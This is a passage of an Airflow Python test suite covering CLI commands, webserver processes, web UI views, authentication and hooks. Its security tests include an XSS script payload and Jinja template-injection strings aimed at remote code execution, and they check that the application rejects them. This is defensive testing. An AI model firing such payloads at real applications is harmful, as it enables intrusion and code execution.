cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run, and the text of
# the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_bash2.dag_id,
"execution_date": self.dagrun_bash2.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
